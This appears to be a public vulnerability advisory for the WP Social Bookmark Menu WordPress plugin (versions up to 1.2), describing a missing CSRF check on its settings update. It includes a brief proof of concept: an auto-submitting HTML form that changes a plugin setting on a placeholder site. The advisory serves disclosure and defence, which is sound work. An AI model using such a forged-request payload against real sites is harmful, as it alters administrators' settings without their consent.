WordPress Plugin Vulnerabilities

WP Social Bookmark Menu <= 1.2 - Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp-social-bookmark-menu.php" method="POST">
    <input type="text" name="flag_save" value="1">
    <input type="text" name="position" value="onthebottom">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-03 (about 4 months ago)

Other